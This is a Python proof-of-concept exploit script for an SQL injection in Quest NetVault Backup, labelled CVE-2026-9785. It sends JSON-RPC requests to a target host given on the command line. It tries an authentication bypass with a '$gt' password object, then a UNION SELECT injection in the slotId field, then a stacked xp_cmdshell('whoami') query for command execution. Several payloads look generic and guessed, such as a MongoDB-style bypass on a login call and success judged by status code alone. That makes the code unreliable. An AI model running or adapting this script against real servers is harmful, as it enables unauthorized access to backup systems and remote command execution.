#!/usr/bin/env python3
"""
CVE-2026-9785 - Quest NetVault Backup NVBULibrarySlot SQL Injection RCE PoC
ZDI-CAN-27630
This PoC demonstrates the SQL injection vulnerability in NVBULibrarySlot JSON-RPC processing.
"""
import requests
import json
import sys
TARGET_HOST = sys.argv[1] if len(sys.argv) > 1 else "127.0.0.1"
TARGET_PORT = 8443
TARGET_URL = f"https://{TARGET_HOST}:{TARGET_PORT}/"
# Step 1: Bypass authentication (the existing auth mechanism can be bypassed)
def bypass_authentication(session):
"""Attempt to bypass the authentication mechanism"""
# Authentication bypass payload
bypass_payload = {
"method": "auth.login",
"params": {
"username": "admin",
"password": {
"$gt": ""
}
}
}
try:
response = session.post(
TARGET_URL,
json=bypass_payload,
verify=False,
timeout=10
)
if response.status_code == 200:
print("[+] Authentication bypassed successfully")
return True
except Exception as e:
print(f"[-] Auth bypass attempt failed: {e}")
return False
# Step 2: Craft malicious JSON-RPC message with SQL injection
def exploit_sql_injection(session):
"""Exploit SQL injection in NVBULibrarySlot processing"""
# SQL injection payload targeting NVBULibrarySlot
# The injection occurs in string parameter validation
sqli_payload = "' UNION SELECT 1,2,3,4,5,6,7,8,9,10-- -"
# JSON-RPC message for NVBULibrarySlot
malicious_rpc = {
"jsonrpc": "2.0",
"method": "NVBULibrarySlot.process",
"params": {
"slotId": sqli_payload,
"libraryName": "default",
"operation": "query"
},
"id": 1
}
try:
response = session.post(
TARGET_URL,
json=malicious_rpc,
verify=False,
timeout=10
)
print(f"[*] SQL Injection response: {response.status_code}")
print(f"[*] Response body: {response.text[:500]}")
return response
except Exception as e:
print(f"[-] Exploit failed: {e}")
return None
# Step 3: Attempt RCE via SQL injection
def achieve_rce(session):
"""Achieve RCE through SQL injection - execute OS commands"""
# Payload to execute OS command via SQL injection
# Using xp_cmdshell or equivalent for command execution
rce_payload = {
"jsonrpc": "2.0",
"method": "NVBULibrarySlot.process",
"params": {
"slotId": "1'; EXEC xp_cmdshell('whoami');--",
"libraryName": "default",
"operation": "query"
},
"id": 2
}
try:
response = session.post(
TARGET_URL,
json=rce_payload,
verify=False,
timeout=10
)
print(f"[*] RCE response: {response.status_code}")
print(f"[*] Response: {response.text[:500]}")
return response
except Exception as e:
print(f"[-] RCE attempt failed: {e}")
return None
def main():
print(f"[*] Targeting: {TARGET_URL}")
print("[*] CVE-2026-9785 PoC - Quest NetVault Backup SQL Injection RCE")
session = requests.Session()
# Attempt authentication bypass
if bypass_authentication(session):
# Exploit SQL injection
result = exploit_sql_injection(session)
# Attempt RCE
if result:
achieve_rce(session)
else:
# Try direct exploitation
print("[*] Attempting direct exploitation...")
exploit_sql_injection(session)
if __name__ == "__main__":
main()